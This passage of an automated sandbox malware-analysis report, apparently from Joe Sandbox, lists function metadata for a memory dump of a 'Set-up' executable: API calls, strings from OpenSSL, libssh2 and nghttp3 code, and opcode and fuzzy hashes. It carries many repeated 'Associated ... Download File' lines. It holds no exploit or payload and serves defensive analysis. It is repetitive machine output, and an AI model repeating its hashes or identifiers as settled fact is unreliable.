Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memcpystrlen
String ID: crypto/property/property_string.c$ossl_property_string
API String ID: 3412268980-3682758481
Opcode ID: 1c7a4d87af13c0ac0469dc304e99f4dfb265bd3b26c922bb4b4579267a8fefc6
Instruction ID: ccd35070e97b367c36af1a16aaea207f4b7118c2f597840a9a2fb546495db4b3
Opcode Fuzzy Hash: 1c7a4d87af13c0ac0469dc304e99f4dfb265bd3b26c922bb4b4579267a8fefc6
Instruction Fuzzy Hash: 9D51F9B6D443157BD6217A65AC43F6B77AC9F11704F080138FD48A7253FA72EA14E392

Function 00C56590 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 160COMMON

Download Yara Rule

APIs

memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00C5662C

Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17262
Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17285
Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172C5
Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172E8

Strings

crypto/ocsp/ocsp_vfy.c, xrefs: 00C566B3, 00C566ED, 00C56767
ocsp_match_issuerid, xrefs: 00C566A9, 00C566E3, 00C5675D

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strcpystrlen$memcmp
String ID: crypto/ocsp/ocsp_vfy.c$ocsp_match_issuerid
API String ID: 1653033214-3047229099
Opcode ID: 3747a1fe2b0b60bb5ab3c9ef88858e0d472d3608a063d073964df990f4429c8e
Instruction ID: 6f1cd3367c2cc18c06e8f3c49147184d8ac4943c0b247fde8aed9967a7f72921
Opcode Fuzzy Hash: 3747a1fe2b0b60bb5ab3c9ef88858e0d472d3608a063d073964df990f4429c8e
Instruction Fuzzy Hash: 1C4146B9A4431076E61036716C87F9B31288F5534EF640234FE199B2C3F9659A98A2AB

Function 00B28710 Relevance: 6.1, APIs: 4, Instructions: 114COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00B28769
SleepConditionVariableCS.KERNEL32(?,?,000000FF), ref: 00B287D1

Part of subcall function 00B288B0: QueryPerformanceFrequency.KERNEL32(?), ref: 00B288C1
Part of subcall function 00B288B0: QueryPerformanceCounter.KERNEL32(?), ref: 00B288CC

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: PerformanceQuery$ConditionCounterCriticalEnterFrequencySectionSleepVariable
String ID:
API String ID: 3112449238-0
Opcode ID: 7db85ddf3feb5253f7fcacc9da5ac330d1226dd04ad941be33244229865ffa82
Instruction ID: aac6f5f77c6b705c2cde45b3dabf1a2063a0a377c7040f34434efc5e61dbb6f8
Opcode Fuzzy Hash: 7db85ddf3feb5253f7fcacc9da5ac330d1226dd04ad941be33244229865ffa82
Instruction Fuzzy Hash: 5E3116B2B01221ABEB049A31EC85B6A76E8FF84310F54457CEC19DB1A1EF35ED14C791

Function 00C160E0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 107COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00C17CCC,?,00000000,00C17127,00C17CCC,00000000,00C3CAB7,00A61A70), ref: 00C160E3
SetLastError.KERNEL32(00000000), ref: 00C161A5

Strings

crypto/err/err_local.h, xrefs: 00C1620C, 00C16227, 00C16257
crypto/err/err.c, xrefs: 00C16275

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ErrorLast
String ID: crypto/err/err.c$crypto/err/err_local.h
API String ID: 1452528299-2963546075
Opcode ID: 5d366c95f9992b0de8d5398b27e465024534bab3b6c56959c89c05a54a0acfb0
Instruction ID: f675359294bd723c45f8b7bfb0bfac4cff8f9ff102ebae7907994f9f127b66eb
Opcode Fuzzy Hash: 5d366c95f9992b0de8d5398b27e465024534bab3b6c56959c89c05a54a0acfb0
Instruction Fuzzy Hash: 5C317AB1A8030376F2212E29BC47BE97350FB4270CF044234FA24691E3E7B56964E691

Function 00BF09A0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 107COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000008,?,00000008,?,?,?,?,?,?,?,00C8066D,?,?,?), ref: 00BF0AAD

Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17262
Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17285
Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172C5
Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172E8

Strings

crypto/buffer/buffer.c, xrefs: 00BF09D2, 00BF0A31, 00BF0A47, 00BF0A7F
BUF_MEM_grow_clean, xrefs: 00BF09CB

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strcpystrlen$memset
String ID: BUF_MEM_grow_clean$crypto/buffer/buffer.c
API String ID: 2970985887-4138242688
Opcode ID: 39fcc3a8ee850dde64f28933cd5b78e81271b37d964224679aa1d5f8601480b9
Instruction ID: 325cba61fbb2615d5008ddfa25284e5995008a0bedeb0b09e4aeab26b1259b9a
Opcode Fuzzy Hash: 39fcc3a8ee850dde64f28933cd5b78e81271b37d964224679aa1d5f8601480b9
Instruction Fuzzy Hash: 2D310B71764308ABDB10BE24DC82F3A7BD9DB41714F088158FA8D9F2D7E674D8489671

Function 00A90639 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00A90646

Part of subcall function 00B4F340: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,00A900B0,?,?,00000000,00000000,?), ref: 00B4F35D

Strings

Unknown error in libssh2, xrefs: 00A906EE, 00A906FF
vssh/libssh2.c, xrefs: 00A906A7, 00A906C9
Attempt to set SFTP stats failed: %s, xrefs: 00A90700

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _time64strlen
String ID: Attempt to set SFTP stats failed: %s$Unknown error in libssh2$vssh/libssh2.c
API String ID: 3014104814-2439779272
Opcode ID: 5af0834c87fd625940554b3e30c725dd1a9ab64812ccf5014024898559c0a396
Instruction ID: 167b47d0036eae520eb3a5bd920c4d635ea2f64c6995a7d60187a58fdf510533
Opcode Fuzzy Hash: 5af0834c87fd625940554b3e30c725dd1a9ab64812ccf5014024898559c0a396
Instruction Fuzzy Hash: 6B31DFB5B04201AFD705AF28D881B9AF7F4BF89324F058568F5584B292E371BA149B92

Function 00A90584 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 73stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00A90594

Part of subcall function 00B4EE30: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00B4EE4F

Strings

Unknown error in libssh2, xrefs: 00A9061D, 00A9062E
vssh/libssh2.c, xrefs: 00A905F8
mkdir command failed: %s, xrefs: 00A9062F

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _time64strlen
String ID: Unknown error in libssh2$mkdir command failed: %s$vssh/libssh2.c
API String ID: 3014104814-3060469362
Opcode ID: 72bb0393760c27dad3fd9d606e5bbff0409ae2d19b7cbfa59f4be88731138fd0
Instruction ID: 7378c961abb347696bc816ab9c689ac9da7c3db968f58e74f1a572352b70dbcd
Opcode Fuzzy Hash: 72bb0393760c27dad3fd9d606e5bbff0409ae2d19b7cbfa59f4be88731138fd0
Instruction Fuzzy Hash: FA2194B5B04201AFD701DF28D881A5AF7F8BF48314F158568F55887352E371EE149B92

Function 00BD4460 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 70stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,00BD71DD,00000000,?,?), ref: 00BD44AC
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000,?,?,?,?,?), ref: 00BD44FF

Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17262
Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C17285
Part of subcall function 00C17220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172C5
Part of subcall function 00C17220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C172E8

Strings

ASN1_STRING_set, xrefs: 00BD447D
crypto/asn1/asn1_lib.c, xrefs: 00BD4487, 00BD44DB

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strlen$strcpy$memcpy
String ID: ASN1_STRING_set$crypto/asn1/asn1_lib.c
API String ID: 1223016426-1431402185
Opcode ID: 8606d9f5acaa1413d12d381320ea2260acfdc7775fab93e6594b1df41374cdde
Instruction ID: 48d0cc48b7c68d96ff4daf07ecda55cd194cac5da033fc1bc5b1acd7797c6f49
Opcode Fuzzy Hash: 8606d9f5acaa1413d12d381320ea2260acfdc7775fab93e6594b1df41374cdde
Instruction Fuzzy Hash: 7211297160421457D7216D249882B6BF3D8DB52714F15019AFD596B3C2FB71DC40A7F2

Function 00AA4930 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00AA4969
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00AA4976
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00AA4994
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00AA49A3

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide$freemalloc
String ID:
API String ID: 2605342592-0
Opcode ID: 0f2f64b870b8244e792f5704f5e081a66b72b8a8fd7ce564048ef1db0d6d270e
Instruction ID: 9d331d9ed6eb365e70ed2a286a257f5e1717bb8fc574a1725a10747f96b07ff1
Opcode Fuzzy Hash: 0f2f64b870b8244e792f5704f5e081a66b72b8a8fd7ce564048ef1db0d6d270e
Instruction Fuzzy Hash: CD01F2B16043056AF3206B639C01B37B7ACEBC6B60F004538F9849B2C0EBB098158763

Function 00B0C220 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 245COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - pbuf->last) == len,nghttp3_qpack.c,00000978), ref: 00B0C4E7

Strings

(size_t)(p - pbuf->last) == len, xrefs: 00B0C4E2
nghttp3_qpack.c, xrefs: 00B0C4DD

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (size_t)(p - pbuf->last) == len$nghttp3_qpack.c
API String ID: 1222420520-3384106985
Opcode ID: 5402d79c505a91431200ebcb1706dd8a63d240466ea50ba89d12aed02a593985
Instruction ID: f40eea46970d04a983c141f8ce48b9ee5d0c7eeb76c7a85f54f756efb01d9ebd
Opcode Fuzzy Hash: 5402d79c505a91431200ebcb1706dd8a63d240466ea50ba89d12aed02a593985
Instruction Fuzzy Hash: DB81B371A083009FD7189F2CC89072ABBD2EB99714F1487BCE9998B3D2D775DC488786

Function 00B0C520 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - rbuf->last) == len,nghttp3_qpack.c,000004D0,?,?,?,?,?,?,00B0B434,?,?,00000000,00000000,?,?), ref: 00B0C68A

Strings

(size_t)(p - rbuf->last) == len, xrefs: 00B0C685
nghttp3_qpack.c, xrefs: 00B0C680

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (size_t)(p - rbuf->last) == len$nghttp3_qpack.c
API String ID: 1222420520-2159148421
Opcode ID: 9d31485e33c8c82a40a303ebe490e5f5cfa640335f397dfc72a6d264575234d4
Instruction ID: 5982de603f19adec88a1f757626889d614cc4e99b36baa6e872bff3ff913cd21
Opcode Fuzzy Hash: 9d31485e33c8c82a40a303ebe490e5f5cfa640335f397dfc72a6d264575234d4
Instruction Fuzzy Hash: BB41F5757082005FD7099B28D89076ABFD2EFD9314F1886BCE889CB3D6DA36DD058781

Function 00B12600 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len,nghttp3_qpack.c,00000EB7,?,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 00B127D1

Strings

nghttp3_qpack.c, xrefs: 00B127C7
nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len, xrefs: 00B127CC

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

